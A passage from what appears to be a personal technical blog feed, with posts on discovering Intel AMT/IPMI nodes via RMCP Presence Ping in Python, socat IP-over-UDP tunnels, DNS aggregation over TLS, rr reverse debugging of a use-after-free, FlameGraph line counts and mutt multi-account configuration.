    the client sends a (possibly) broadcast RMCP Presence Ping message over\n UDP port 623 (asf-rmcp);

    \n
  2. \n
  3. \n

    the nodes supporting ASF (such as DASH/AMT and IPMI nodes) send a\n RMCP Presence Pong.

    \n
  4. \n
\n

RMCP Header:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SizeField
1BVersion (0x6 for RMCP 1.0)
1BReserved
1BSequence number (0-254; 255 when no acknowledge is needed)
1BClass of Message
Bit 7, 1 for acknowledge
Bits 6:4, reserved
Bits 3:0, 6 for ASF, 7 for IPMI, etc.
\n

All messages which are not acknowledgements have an\nRMCP data\nfield after the header:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SizeField
4BIANA Enterprise Number; serves as a namespace for the message type (4542 for ASF-RMCP)
1BMessage Type (for ASF-RMCP, we have 0x80 for Presence Ping, 0x40 for Presence Pong)
1BMessage Tag
1BReserved
1BData Length
VarData (payload)
\n

We can handle RMCP messages with:

\n
ASF_RMCP_VERSION1 = 0x6\nIANA_ASF = 4542\nASF_RMCP_FORMAT = \"!BBBBIBBBB\"\n\n# RMCP ASF message (not ack)\nclass Message:\n    def __init__(self):\n        self.version = ASF_RMCP_VERSION1\n        self.reserved = 0x00\n        self.seqno = 0x00\n        self.message_class = 0x00\n        self.entreprise_number = IANA_ASF\n        self.message_type = 0x00\n        self.message_tag = 0x00\n        self.data = bytearray()\n\n    def load(self, message):\n        if len(message) < struct.calcsize(ASF_RMCP_FORMAT):\n            raise ValueError(\"Message too small\")\n        (self.version, self.reserved, self.seqno, self.message_class,\n         self.entreprise_number, self.message_type, self.message_tag,\n         self.reserved, data_length) = \\\n            struct.unpack_from(ASF_RMCP_FORMAT, message)\n        if len(message) != data_length + struct.calcsize(ASF_RMCP_FORMAT):\n            raise ValueError(\"Bad length\")\n        rmcp_size = struct.calcsize(ASF_RMCP_FORMAT)\n        self.data = bytearray(memoryview(message)[rmcp_size:])\n\n    def to_bytes(self):\n        size = struct.calcsize(ASF_RMCP_FORMAT) + len(self.data)\n        res = bytearray(size)\n        struct.pack_into(ASF_RMCP_FORMAT, res, 0,\n                         self.version, self.reserved, self.seqno,\n                         self.message_class, self.entreprise_number,\n                         self.message_type, self.message_tag, self.reserved,\n                         len(self.data))\n        memoryview(res)[struct.calcsize(ASF_RMCP_FORMAT):] = self.data\n        return res\n
\n\n\n

For Presence Ping, there is no payload. For Presence\nPong,\nthe payload is:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SizeField
4BIANA Enterprise Number (4542 if no OEM-specific things are used)
4BOEM Defined
1BSupported Entities
Bit 7, set if IPMI is supported
Bits 6:4, reserved
Bits 3:0, 1 for ASF version 1.0
1BSupported interactions
Bit 5: set if DASH (AMT) is supported
5BReserved
\n

We can handle Presence Pong data with:

\n
ASF_RMCP_PONG_FORMAT = \"!IIBBBBBBBB\"\n\nclass PongData:\n    def __init__(self, payload):\n        if struct.calcsize(ASF_RMCP_PONG_FORMAT) != len(payload):\n            print(\"Bad length for pong payload expected %i but was %i\" %\n                  (struct.calcsize(ASF_RMCP_PONG_FORMAT), len(payload)))\n        (self.entreprise_number, self.oem_defined, self.supported_entities,\n         self.supported_interactions, self.reserved1,\n         self.reserved2, self.reserved3, self.reserved4, self.reserved5,\n         self.reserved6) = struct.unpack_from(ASF_RMCP_PONG_FORMAT, payload)\n\n    def ipmi(self):\n        # Bit 7 of \"supported entities\" is set if IPMI is supported:\n        return (self.supported_entities & 128) != 0\n\n    def asf(self):\n        # Bits 3:0 are 1 for ASF version 1.0:\n        return (self.supported_entities & 15) == 1\n\n    def dash(self):\n        # Bit 5 of \"supported interactions\" is set if DASH is supported:\n        return (self.supported_interactions & 32) != 0\n\n    def features(self):\n        res = []\n        if self.ipmi():\n            res.append(\"ipmi\")\n        if self.asf():\n            res.append(\"asf\")\n        if self.dash():\n            res.append(\"dash\")\n        return res\n
\n\n\n

We send a Presence Ping message to some (possibly broadcast) address:

\n
ASF_RMCP_PORT = 623\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING = 0x80\n\nm = Message()\nm.message_class = 0x06  # class 6 = ASF (coincidentally equal to ASF_RMCP_VERSION1)\nm.message_type = ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING\n\nsock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nsock.sendto(m.to_bytes(), (address, ASF_RMCP_PORT))\n
\n\n\n

And then we process the messages:

\n
ASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG = 0x40\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK = 0x86\n\nsock.settimeout(1)\n\ntry:\n    while True:\n        data, addr = sock.recvfrom(1024)\n        logging.debug(\"From \" + str(addr[0]) + \": \" + str(data))\n        if len(data) == 4 and data[0] == ASF_RMCP_VERSION1 and data[2] == 0 \\\n                and data[3] == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK:\n            logging.debug(\"Ack from \" + str(addr[0]))\n            continue\n        try:\n            m.load(data)\n        except:\n            continue\n        if m.message_type == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG:\n            # Pong:\n            print(str(addr[0]))\n            pongData = PongData(m.data)\n            features = pongData.features()\n            print(\"\\tEntreprise: %s\" %\n                  entreprise_name(pongData.entreprise_number))\n            if len(features) != 0:\n                print(\"\\tFeatures: %s\" % \",\".join(features))\nexcept socket.timeout:\n    pass\n
\n\n\n

Full code

\n

Here's the full code:

\n
#!/usr/bin/env python3\n# Use ASF RMCP to discover RMCP-aware nodes (such as Intel AMT or IPMI)\n# Keywords: DMTF, ASF RMCP, DASH, AMT, IPMI.\n\nimport socket\nimport struct\nimport sys\nimport logging\nimport ipaddress\n\nASF_RMCP_PORT = 623\nASF_RMCP_FORMAT = \"!BBBBIBBBB\"\nASF_RMCP_PONG_FORMAT = \"!IIBBBBBBBB\"\nASF_RMCP_VERSION1 = 0x6\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG = 0x40\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING = 0x80\nASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK = 0x86\nIANA_ASF = 4542\n\naddress = sys.argv[1]\nif ipaddress.ip_address(address).version == 4:\n    address = \"::ffff:\" + address\n\nentreprise_names = {\n    343: \"Intel\",\n    3704: \"AMD\",\n    4542: \"Alerting Specifications Forum\",\n}\n\n\ndef entreprise_name(n):\n    if n in entreprise_names:\n        return entreprise_names[n]\n    else:\n        return str(n)\n\n\n# RMCP ASF message (not ack)\nclass Message:\n    def __init__(self):\n        self.version = ASF_RMCP_VERSION1\n        self.reserved = 0x00\n        self.seqno = 0x00\n        self.message_class = 0x00\n        self.entreprise_number = IANA_ASF\n        self.message_type = 0x00\n        self.message_tag = 0x00\n        self.data = bytearray()\n\n    def load(self, message):\n        if len(message) < struct.calcsize(ASF_RMCP_FORMAT):\n            raise ValueError(\"Message too small\")\n        (self.version, self.reserved, self.seqno, self.message_class,\n         self.entreprise_number, self.message_type, self.message_tag,\n         self.reserved, data_length) = \\\n            struct.unpack_from(ASF_RMCP_FORMAT, message)\n        if len(message) != data_length + struct.calcsize(ASF_RMCP_FORMAT):\n            raise ValueError(\"Bad length\")\n        rmcp_size = struct.calcsize(ASF_RMCP_FORMAT)\n        self.data = bytearray(memoryview(message)[rmcp_size:])\n\n    def to_bytes(self):\n        size = struct.calcsize(ASF_RMCP_FORMAT) + len(self.data)\n        res = bytearray(size)\n
        struct.pack_into(ASF_RMCP_FORMAT, res, 0,\n                         self.version, self.reserved, self.seqno,\n                         self.message_class, self.entreprise_number,\n                         self.message_type, self.message_tag, self.reserved,\n                         len(self.data))\n        memoryview(res)[struct.calcsize(ASF_RMCP_FORMAT):] = self.data\n        return res\n\n\nclass PongData:\n    def __init__(self, payload):\n        if struct.calcsize(ASF_RMCP_PONG_FORMAT) != len(payload):\n            print(\"Bad length for pong payload: expected %i but was %i\" %\n                  (struct.calcsize(ASF_RMCP_PONG_FORMAT), len(payload)))\n        (self.entreprise_number, self.oem_defined, self.supported_entities,\n         self.supported_interactions, self.reserved1,\n         self.reserved2, self.reserved3, self.reserved4, self.reserved5,\n         self.reserved6) = struct.unpack_from(ASF_RMCP_PONG_FORMAT, payload)\n\n    def ipmi(self):\n        # Bit 7 of the supported entities field: IPMI supported\n        return (self.supported_entities & 128) != 0\n\n    def asf(self):\n        # Bits 0-3 of the supported entities field: ASF version (1 = ASF v1.0)\n        return (self.supported_entities & 15) == 1\n\n    def dash(self):\n        # Bit 5 of the supported interactions field: DASH supported\n        return (self.supported_interactions & 32) != 0\n\n    def features(self):\n        res = []\n        if self.ipmi():\n            res.append(\"ipmi\")\n        if self.asf():\n            res.append(\"asf\")\n        if self.dash():\n            res.append(\"dash\")\n        return res\n\nm = Message()\nm.message_class = ASF_RMCP_VERSION1\nm.message_type = ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING\n\nsock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nsock.sendto(m.to_bytes(), (address, ASF_RMCP_PORT))\nsock.settimeout(1)\n\nlogging.info(\"Listening\")\ntry:\n    while True:\n        data, addr = sock.recvfrom(1024)\n        logging.debug(\"From \" + str(addr[0]) + \": \" + str(data))\n        if len(data) == 4 and data[0] == ASF_RMCP_VERSION1 and data[2] == 0 \\\n
                and data[3] == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK:\n            logging.debug(\"Ack from \" + str(addr[0]))\n            continue\n        try:\n            m.load(data)\n        except Exception:\n            continue\n        if m.message_type == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG:\n            # Pong:\n            print(str(addr[0]))\n            pongData = PongData(m.data)\n            features = pongData.features()\n            print(\"\\tEntreprise: %s\" %\n                  entreprise_name(pongData.entreprise_number))\n            if len(features) != 0:\n                print(\"\\tFeatures: %s\" % \",\".join(features))\nexcept socket.timeout:\n    pass\n
\n\n\n

Results

\n

We can discover devices on the local network by using its broadcast address:

\n
\n$ ./rmcp-discover 192.0.2.255\n::ffff:192.0.2.56\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.7.32\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.228\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.230\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.3.90\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.170\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.8.105\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.5.123\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.235\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.29\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.233\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.171\n    Entreprise: Intel\n    Features: dash\n
\n\n

They advertise Intel and DASH: those are probably AMT devices.

\n

We can use the same script to discover IPMI nodes as well:

\n
\n$ ./rmcp-discover 198.51.100.42\n::ffff:198.51.100.42\n    Entreprise: Alerting Specifications Forum\n    Features: ipmi,asf\n
\n\n

We cannot (reliably) use this to detect AMT on the local machine. The reason is\nthat the messages are sent to the ME when they arrive on the hardware Ethernet\nadapter. Messages emitted by the localhost to its own IP address\nare handled internally by the OS: they never reach the hardware Ethernet adapter\nand thus do not reach the ME.\nIn order to communicate with its own ME, the OS needs to communicate using the MEI\ninstead of using IP. The Intel LMS can be installed to reach the local ME over\nIP: AFAIU, it listens on the suitable TCP and UDP ports and forwards the requests\nto the ME using the MEI.

\n

References

\n

Technical documentation

\n\n

Documentation

\n\n

Articles

\n\n

CVE-2017-5689

\n

Interesting references following the\nINTEL-SA-00075/CVE-2017-5689\nvulnerability:

\n"}, {"id": "http://www.gabriel.urdhr.fr/2016/03/25/cloc-with-flamegraph/", "title": "Number of lines of code with FlameGraph", "url": "https://www.gabriel.urdhr.fr/2016/03/25/cloc-with-flamegraph/", "date_published": "2016-03-25T00:00:00+01:00", "date_modified": "2016-03-25T00:00:00+01:00", "tags": ["computer", "simgrid"], "content_html": "

FlameGraph\nis used to display stack trace samples but we can use it for\nother purposes as well.

\n

For example, we can quite simply display where the lines of code\nof a project are:

\n
cloc --csv-delimiter=\"$(printf '\\t')\" --by-file --quiet --csv src/ include/ |\nsed '1,2d' |\ncut -f 2,5 |\nsed 's/\\//;/g' |\n./flamegraph.pl\n
\n\n\n
\n\n \"\"\n\n
Number of lines of code in SimGrid
\n
\n\n
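The sed/cut transformation above can also be sketched in Python; `flamegraph_lines` is a hypothetical helper name, not part of the post's pipeline. Each file path becomes a semicolon-separated frame stack followed by its line count, which is exactly the input format flamegraph.pl expects:

```python
def flamegraph_lines(files):
    """Turn (path, line_count) pairs into flamegraph.pl input lines."""
    return [path.replace("/", ";") + " " + str(count)
            for path, count in files]

lines = flamegraph_lines([("src/xbt/dynar.c", 1200), ("include/xbt.h", 50)])
print("\n".join(lines))
```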

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2016/01/12/ip-over-udp-with-socat/", "title": "IP over UDP tunnel with socat", "url": "https://www.gabriel.urdhr.fr/2016/01/12/ip-over-udp-with-socat/", "date_published": "2016-01-12T00:00:00+01:00", "date_modified": "2016-01-12T00:00:00+01:00", "tags": ["computer", "network", "vpn", "encapsulation", "tun"], "content_html": "

A simple way to create IP over\nUDP tunnels using\nsocat.

\n

This is the protocol stack we're going to implement:

\n
\n[ IP  ]\n[ UDP ]\n[ IP  ]\n
\n\n

In order to create a tunnel, we must create a\nTUN\ndevice interface. A TUN device is a network device managed by a\nuserspace program:

\n\n

We'd like to have a simple program which manages such a TUN device by\nencapsulating its packets in a UDP socket.

\n
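For reference, the core of such a userspace program is a Linux-specific ioctl() on /dev/net/tun. Here is a minimal sketch: the TUNSETIFF constant and the ifreq layout are taken from <linux/if_tun.h> and <net/if.h>, and actually opening the device requires root (the commented-out part):

```python
import struct

# Linux TUN/TAP constants (from <linux/if_tun.h>)
TUNSETIFF = 0x400454ca
IFF_TUN = 0x0001    # IP-level (TUN) device
IFF_NO_PI = 0x1000  # no extra packet-information header

def tun_ifreq(name):
    """Build the ifreq structure passed to ioctl(TUNSETIFF):
    a 16-byte interface name followed by a short flags field."""
    return struct.pack("16sH", name.encode(), IFF_TUN | IFF_NO_PI)

# Actually creating the device (requires root):
#   import fcntl, os
#   tun = os.open("/dev/net/tun", os.O_RDWR)
#   fcntl.ioctl(tun, TUNSETIFF, tun_ifreq("tunudp"))
#   ...then os.read(tun, 2048) returns one IP packet at a time,
#   ready to be forwarded over a UDP socket.
```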

Using socat

\n

It turns out socat can do this already!

\n

On the first host:

\n
sudo socat UDP:192.0.2.2:9000,bind=192.0.2.1:9000 \\\n  TUN:10.0.1.1/24,tun-name=tunudp,iff-no-pi,tun-type=tun,su=$USER,iff-up\n
\n\n\n

On the second one:

\n
sudo socat UDP:192.0.2.1:9000,bind=192.0.2.2:9000 \\\n  TUN:10.0.1.2/24,tun-name=tunudp,iff-no-pi,tun-type=tun,su=$USER,iff-up\n
\n\n\n

Explanations:

\n\n

Now we can ping over the tunnel:

\n
host1:~$ ping 10.0.1.2\nPING 10.0.1.2 (10.0.1.2) 56(84) bytes of data.\n64 bytes from 10.0.1.2: icmp_seq=1 ttl=64 time=39.3 ms\n64 bytes from 10.0.1.2: icmp_seq=2 ttl=64 time=40.1 ms\n\nhost1:~$ ip route get 10.0.1.2\n10.0.1.2 dev tunudp  src 10.0.1.1 \n    cache\n
\n\n\n

You can add IPv6 addresses to the tunnel and it works as expected:\nboth IPv4 and IPv6 packets are sent over the same UDP socket and the\nversion field is used to distinguish them.

\n

Using ip fou

\n

The other solution is to use ip fou (for\nfoo over UDP):

\n
modprobe fou\nip fou add port 9000 ipproto 4\nip link add name tunudp type ipip \\\n       remote 192.0.2.2 local 192.0.2.1 ttl 255 \\\n       encap fou \\\n       encap-sport auto encap-dport 9000\n
\n\n\n

We can expect better performance as it's handled completely on the\nkernel side. The downside is that you have to create two different\ntunnels (one for encapsulating IPv4 and the other for IPv6).

"}, {"id": "http://www.gabriel.urdhr.fr/2015/12/09/dns-aggregator-tls/", "title": "DNS aggregation over TLS", "url": "https://www.gabriel.urdhr.fr/2015/12/09/dns-aggregator-tls/", "date_published": "2015-12-09T00:00:00+01:00", "date_modified": "2015-12-09T00:00:00+01:00", "tags": ["computer", "dns", "network", "internet", "tls"], "content_html": "

In a previous\npost, I tried\ndifferent solutions for tunnelling DNS over\nTLS. One of those solutions was\nusing a dedicated DNS-over-UDP fake\nservice replying to all\nqueries with the truncation (TC) flag set: this was causing the stub\nresolvers to retry the query using a TCP-based virtual-circuit. This\nsolution is interesting because it is dead simple (it fits in a few\nlines of code) but it is clearly a hack. Here, I'm using a dedicated\nDNS forwarder aggregating all\nthe incoming DNS-over-UDP requests over a single persistent TCP\nvirtual-circuit.

\n

Update (2017-05-17):\nThis was written before DNS/TLS was a thing\n(and before it was natively implemented in resolvers).\nSee DNS Privacy\nfor up-to-date instructions.

\n

Summary

\n

The different solutions presented in the previous post on the\nresolver side:

\n\n

The last solution is using this protocol stack:

\n
\n     DNSSEC valid.   TLS Init.\n         cache       verify TLS\n\n[DNS]<->[DNS   ]<------------------------>[DNS]\n[   ]   [      ]<---->[  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---->[IP    ]<---------->[IP ]\nStub R.  Forwarder    TLS Init. Internet   Recursive\n         (unbound)    (stunnel)\n
\n\n

However,\neach DNS request uses a new TCP connection between the\nstub resolver and unbound. Between unbound and stunnel, each\nincoming TCP connection is encapsulated in a new TLS\nconnection. This is very inefficient and the resulting DNS service is\nnot very robust.

\n

Performance considerations for DNS over TLS are summarized in the TLS\nfor DNS: Initiation and Performance\nConsiderations\ndraft (emphasis mine):

\n
\n

Latency: Compared to UDP, DNS-over-TCP requires an additional\nround-trip-time [\u2026]. The TLS handshake adds another two RTTs of\nlatency.

\n

State: The use of connection-oriented TCP requires keeping\nadditional state in both kernels and applications. [\u2026]

\n

Processing: [\u2026] slightly higher CPU usage.

\n

Number of connections: clients SHOULD minimize creation of new\nTCP connections. Use of a local DNS request aggregator (a\nparticular type of forwarder) allows a single active DNS-over-TLS\nconnection from any given client computer to its server.

\n
\n

DNS aggregation over a persistent TCP connection

\n

In order to fix this problem, I wrote a prototype DNS\nforwarder which aggregates all\nthe local UDP-based DNS messages over a persistent TCP stream:

\n\n
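The core of such an aggregator is the DNS-over-TCP framing (RFC 1035, section 4.2.2): each UDP message is prefixed by its two-byte big-endian length before being written to the persistent virtual circuit. A minimal sketch of the two directions (not dnsfwd's actual code):

```python
import struct

def frame(message):
    """Frame one UDP DNS message for a TCP virtual circuit:
    two-byte big-endian length, then the message itself."""
    return struct.pack("!H", len(message)) + message

def unframe(stream):
    """Split a TCP byte stream back into individual DNS messages.
    Returns the complete messages and the unconsumed remainder."""
    messages = []
    while len(stream) >= 2:
        (length,) = struct.unpack_from("!H", stream)
        if len(stream) < 2 + length:
            break  # incomplete message: wait for more bytes
        messages.append(stream[2:2 + length])
        stream = stream[2 + length:]
    return messages, stream

data = frame(b"query1") + frame(b"query2")
msgs, rest = unframe(data)
```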

This service can then be coupled with a TLS initiator (stunnel)\nwhich encapsulates the persistent DNS stream in TLS.

\n

In the future, the tool might have an option to talk TLS natively. My\nexcuse for not adding builtin support for TLS was that it gives you\nthe freedom of choosing which TLS implementation you would like to use\n(OpenSSL with stunnel or socat; GnuTLS with gnutls-serv or a\ntool such as faucet; NSS, though I do not know a suitable\ntool using this library; etc.).

\n
\n        VC encap. DNSSEC valid.    TLS\n    Mux.        cache        TLS verify\n\n[DNS]<->[DNS    ]<->[DNS   ]<---------------------->[DNS]\n                                     [TLS]<-------->[TLS]\n[UDP]<->[UDP|TCP]<->[TCP   ]<---->[TCP   ]<-------->[TCP]\n[IP ]<->[IP     ]<->[IP    ]<---->[IP    ]<-------->[IP ]\nClient  Aggregator  Forwarder     TLS Init. Internet  Recursive\n         (dnsfwd)   (unbound)    (stunnel)\n
\n\n

The resulting DNS service is much more robust.

\n

Warning: This software is currently a prototype. Use at your\nown risk.

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/11/25/rr-use-after-free/", "title": "Debugging use-after-free with RR reverse execution", "url": "https://www.gabriel.urdhr.fr/2015/11/25/rr-use-after-free/", "date_published": "2015-11-25T00:00:00+01:00", "date_modified": "2015-11-25T00:00:00+01:00", "tags": ["computer", "debug", "gdb", "rr", "simgrid"], "content_html": "

RR is a very useful tool for debugging. It\ncan record the execution of a program and then replay the exact same\nexecution at will inside a debugger. One very useful extra power\navailable since 4.0 is the support for efficient reverse\nexecution\nwhich can be used to find the root cause of a bug in your program\nby rewinding time. In this example, we reverse-execute a program from a\ncase of use-after-free in order to find where the block of memory was\nfreed.

\n

TLDR

\n
\n$ rr record ./foo my_args\n$ rr replay\n(rr) continue\n(rr) break free if $rdi == some_address\n(rr) reverse-continue\n
\n\n

Problem

\n

We have a case of use-after-free:

\n
$ gdb --args java -classpath \"$classpath\" surfCpuModel/TestCpuModel \\\n  small_platform.xml surfCpuModelDeployment.xml \\\n  --cfg=host/model:compound\n\n(gdb) run\n[\u2026]\n\nProgram received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff7fbb700 (LWP 12766)]\n0x00007fffe4fe3fb7 in xbt_dynar_map (dynar=0x7ffff0276ea0, op=0x56295a443b6c65) at /home/gabriel/simgrid/src/xbt/dynar.c:603\n603     op(elm);\n\n(gdb) p *dynar\n$2 = {size = 2949444837771837443, used = 3415824664728436765,\n      elmsize = 3414970357536090483, data = 0x646f4d2f66727573,\n      free_f = 0x56295a443b6c65}\n
\n\n

The fields of this structure are all wrong and we suspect that this\nblock of heap memory was already freed and reused by another allocation.

\n

We could use GDB with a conditional breakpoint on free(ptr) with\nptr == dynar, but this approach poses a few problems:

\n
    \n
  1. \n

    in the new execution of the program this address might be\n completely different because of different sources of indeterminism\n such as:\n    - ASLR, which we could disable with setarch -R,\n    - scheduling of the different threads (and Java usually spawns quite\n a few threads);

    \n
  2. \n

    there could be a lot of calls to free() for this specific\n address for previous allocations before we reach the correct one.

    \n
\n

Using RR

\n

Deterministic recording

\n

RR can be used to create a recording of a given execution of the\nprogram. This execution can then be replayed exactly inside a\ndebugger. This fixes our first problem.

\n

Let's record our crash in RR:

\n
$ rr record java -classpath \"$classpath\" surfCpuModel/TestCpuModel \\\n  small_platform.xml surfCpuModelDeployment.xml \\\n    --cfg=host/model:compound\n[\u2026]\n# A fatal error has been detected by the Java Runtime Environment:\n[\u2026]\n
\n\n

Now we can replay the exact same execution over and over again in a special\nGDB session:

\n
$ rr replay\n(rr) continue\nContinuing.\n[\u2026]\n\nProgram received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 12601.12602]\n0x00007fe94761efb7 in xbt_dynar_map (dynar=0x7fe96c24f350, op=0x56295a443b6c65) at /home/gabriel/simgrid/src/xbt/dynar.c:603\n603     op(elm);\n
\n\n

Reverse execution to the root cause of the problem

\n

We want to know who freed this block of memory. RR 4.0 provides\nsupport for efficient reverse-execution which can be used to solve our\nsecond problem.

\n

Let's set a conditional breakpoint on free():

\n
(rr) p dynar\n$1 = (const xbt_dynar_t) 0x7fe96c24f350\n\n(rr) break free if $rdi == 0x7fe96c24f350\n
\n\n

Note: This is for x86_64.\nIn the x86_64 ABI,\nthe RDI register is used to pass the first parameter.

\n

Now we can use RR super powers by reverse-executing the program until\nwe find who freed this block of memory:

\n
\n(rr) reverse-continue\nContinuing.\nProgram received signal SIGSEGV, Segmentation fault.\n[\u2026]\n\n(rr) reverse-continue\nContinuing.\nBreakpoint 1, __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n2917    malloc.c: Aucun fichier ou dossier de ce type.\n\n(bt) backtrace\n#0  __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n#1  0x00007fe96b18486d in ZIP_FreeEntry (jz=0x7fe96c0f43d0, ze=0x7fe96c24f6e0) at ../../../src/share/native/java/util/zip/zip_util.c:1104\n#2  0x00007fe968191d78 in ?? ()\n#3  0x00007fe96818dcbb in ?? ()\n#4  0x0000000000000002 in ?? ()\n#5  0x00007fe96c24f6e0 in ?? ()\n#6  0x000000077ab0c2d8 in ?? ()\n#7  0x00007fe970641a80 in ?? ()\n#8  0x0000000000000000 in ?? ()\n\n(rr) reverse-continue\nContinuing.\nBreakpoint 1, __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n2917    in malloc.c\n\n(rr) backtrace\n#0  __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n#1  0x00007fe94761f28e in xbt_dynar_to_array (dynar=0x7fe96c24f350) at /home/gabriel/simgrid/src/xbt/dynar.c:691\n#2  0x00007fe946b98a2f in SwigDirector_CpuModel::createCpu (this=0x7fe96c14d850, name=0x7fe96c156862 \"Tremblay\", power_peak=0x7fe96c24f350, pstate=0, \n    power_scale=1, power_trace=0x0, core=1, state_initial=SURF_RESOURCE_ON, state_trace=0x0, cpu_properties=0x0)\n    at /home/gabriel/simgrid/src/bindings/java/org/simgrid/surf/surfJAVA_wrap.cxx:1571\n#3  0x00007fe947531615 in cpu_parse_init (host=0x7fe9706456d0) at /home/gabriel/simgrid/src/surf/cpu_interface.cpp:44\n#4  0x00007fe947593f88 in sg_platf_new_host (h=0x7fe9706456d0) at /home/gabriel/simgrid/src/surf/sg_platf.c:138\n#5  0x00007fe9475e54fb in ETag_surfxml_host () at /home/gabriel/simgrid/src/surf/surfxml_parse.c:481\n#6  0x00007fe9475da1dc in surf_parse_lex () at src/surf/simgrid_dtd.c:7093\n#7  0x00007fe9475e84f2 in _surf_parse () at /home/gabriel/simgrid/src/surf/surfxml_parse.c:1068\n#8  0x00007fe9475e8cfa in parse_platform_file (file=0x7fe96c14f1e0 
\"/home/gabriel/simgrid/examples/java/../platforms/small_platform.xml\")\n    at /home/gabriel/simgrid/src/surf/surfxml_parseplatf.c:172\n#9  0x00007fe9475142f4 in SIMIX_create_environment (file=0x7fe96c14f1e0 \"/home/gabriel/simgrid/examples/java/../platforms/small_platform.xml\")\n    at /home/gabriel/simgrid/src/simix/smx_environment.c:39\n#10 0x00007fe9474cd98f in MSG_create_environment (file=0x7fe96c14f1e0 \"/home/gabriel/simgrid/examples/java/../platforms/small_platform.xml\")\n    at /home/gabriel/simgrid/src/msg/msg_environment.c:37\n#11 0x00007fe94686c473 in Java_org_simgrid_msg_Msg_createEnvironment (env=0x7fe96c00a1d8, cls=0x7fe9706459a8, jplatformFile=0x7fe9706459b8)\n    at /home/gabriel/simgrid/src/bindings/java/jmsg.c:203\n#12 0x00007fe968191d78 in ?? ()\n#13 0x00000007fffffffe in ?? ()\n#14 0x00007fe970645958 in ?? ()\n#15 0x00000007f5cd1100 in ?? ()\n#16 0x00007fe9706459b8 in ?? ()\n#17 0x00000007f5cd1738 in ?? ()\n#18 0x0000000000000000 in ?? ()\n
\n\n

Now that we have found the offending free() call we can inspect the state\nof the program:

\n
\n(rr) frame 1\n#1  0x00007fe94761f28e in xbt_dynar_to_array (dynar=0x7fe96c24f350) at /home/gabriel/simgrid/src/xbt/dynar.c:691\n691   free(dynar);\n\n(rr) list\n686 {\n687   void *res;\n688   xbt_dynar_shrink(dynar, 1);\n689   memset(xbt_dynar_push_ptr(dynar), 0, dynar->elmsize);\n690   res = dynar->data;\n691   free(dynar);\n692   return res;\n693 }\n694\n695 /** @brief Compare two dynars\n
\n\n

If necessary we could continue reverse-executing in order to understand\nbetter what caused the problem.

\n

Using GDB

\n

While GDB has builtin support for reverse\nexecution,\ndoing the same thing in GDB is much slower. Moreover, recording\nthe execution fills the GDB record buffer quite rapidly, which prevents\nus from recording a large execution: with the native support of GDB\nwe would probably need to narrow down the region where the bug appeared\nin order to only record (and then reverse-execute) a small part of the\nexecution of the program.

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/10/12/mutt-multiaccount/", "title": "Multiple accounts with mutt", "url": "https://www.gabriel.urdhr.fr/2015/10/12/mutt-multiaccount/", "date_published": "2015-10-12T00:00:00+02:00", "date_modified": "2015-10-12T00:00:00+02:00", "tags": ["computer", "mutt", "mail"], "content_html": "

If you try to use mutt, you will wonder how you're supposed to handle\nmultiple\naccounts.\nYou will find suggestions to bind some keys to switch between\naccounts, or to use hooks.

\n

My current solution is much simpler: create a configuration file for\neach account and do not try to handle different accounts in the same\nprocess. I have multiple configuration files (one for each account).\nThey are named mutt-foo and are in my PATH (in ~/.bin) with the\nexecutable bit set:

\n
#!/usr/bin/mutt -F\n\n# ##### Basic config:\n\nset realname = \"John Doe\"\nset from = \"john.doe@example.com\"\n\n# Sane configuration:\nset send_charset=\"utf-8\"\nset ssl_force_tls = yes\n\nset smtp_url  = \"smtp://jdoe@smtp.example.com/\"\n\nset imap_user = \"jdoe\"\nset folder = \"imaps://imap.example.com\"\nset spoolfile = \"=INBOX\"\nset record = \"=INBOX\"\nset postponed = \"=Drafts\"\nset trash = \"=Trash\"\n\nset header_cache = \"~/.mutt/cache/example/\"\n\n# ###### UI\n\nset edit_headers = yes\n
\n\n\n

I can call one of the mutt-foo scripts in order to connect to a\ngiven account.

\n

